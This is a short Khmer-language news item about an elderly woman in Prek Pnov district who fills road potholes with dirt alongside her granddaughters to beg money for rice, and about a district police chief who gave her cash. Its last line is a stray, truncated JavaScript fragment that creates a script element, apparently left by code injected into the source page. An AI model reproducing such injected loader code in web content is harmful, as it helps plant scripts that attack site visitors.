លោកយាយប៉ឺងវ័យជាង៧០ឆ្នាំជីកដីលុបជង្ហុកផ្លូវសុំលុយទិញអង្ករ ទទួលបានយកចិត្តពីលោកអធិការខណ្ឌពោធិ៍សែនជ័យ
លោកយាយ ប៉ឺង រស់នៅជាមួយកូនស្រីមេម៉ាយកូន២ ដោយសារតែជីវភាពគ្រួសារក្រីក្រពេក កូនស្រីគ្មានមុខរបរដើរបេះវ័លរំពាក់យកទៅលក់បានថវិកាបន្តិចបន្តួចនោះ មិនអាចគ្រប់ទិញអង្ករហូបព្រឹកល្ងាចមិនគ្រប់នោះទើប លោកយាយបានសម្រេចនាំចៅស្រី២នាក់ទៅជីកកាយអាចម៌ដីយកទៅលុបជង្ហកផ្លូវ ដើម្បីសុំលុយពីសប្បុរជននានា ដែលធ្វើដំណើរ ឆ្លងកាត់តាមបណ្តោយផ្លូវនោះ គ្រាន់បានថវិកាខ្លះយកទៅបង្គ្រប់ទិញអង្កររួចមួយថ្ងៃៗដោយឃើញពីភាពលំបាករបស់លោកយាយ ស្របពេលលោកបានធ្វើដំណើរឆ្លងកាត់ផ្លូវនោះបានជួបលោកយាយក៏បានឈប់រថយន្តលះបង់ថវិកាផ្ទាល់លោកជួយទៅលោកយាយដើម្បីបានយកទៅប្រើប្រាស់ដោះទ័លមួយគ្រាផងដែរ ។
លោកយាយ ប៉ឺងមានវ័យជរាណាស់ហើយរកិលគូថជាប់និងដីដៃរាវខ្វាសៗទាញ់ចបកាប់កាយដីជាមួយចៅស្រីតូចៗពីរនាក់ទាំង កណ្តាលថ្ងៃ ត្រង់ ចែស ដើម្បីយកអាចម៌ដីទៅលុបជង្ហក់ផ្លូវស្រុកមួយកន្លែង ដើម្បីសុំលុយពីសប្បុរសជននានា បាននិយាយទាំងទឹក មុខស្រពាបស្រពោនថា លោកយាយរស់នៅជាមួយកូនស្រីមេម៉ាយកូនពីរ ហើយកូនស្រីមិនមានមុខរបរអ្វី ដីស្រែចំការក៏គ្មានសព្វ ថ្ងៃកូនស្រីរបស់ លោកយាយដើរបោចវ័លរំពាក់យកទៅលក់បានកំរ៉ៃបន្តិចបន្តួចយកទៅទ្រងទ្រង់គ្រួសារ ប៉ុន្តែកំរ៉ៃនោះមិនគ្រប់ទិញ អង្ករព្រឹកល្ងាចដាំបាយហូបនោះទេទើបលោកយាយសម្រេចនាំចៅស្រីមកជីកកាយដីលុបថ្លក់ជង្ហក់ផ្លូវដើម្បីសុំលុយពីអ្នកធ្វើដំណើរឆ្លងកាត់ទីនេះ ។
លោកយាយរស់នៅក្នុងក្នុងភូមិត្នោតខ្ពស់ សង្កាត់ពន្សាំង ខណ្ឌព្រែកព្នៅ មានកូនស្រីឈ្មោះ ចក់ ប៉េប ជាស្រ្តីមេម៉ាយកូន២៕
var d=document;var s=d.createElement(‘script’);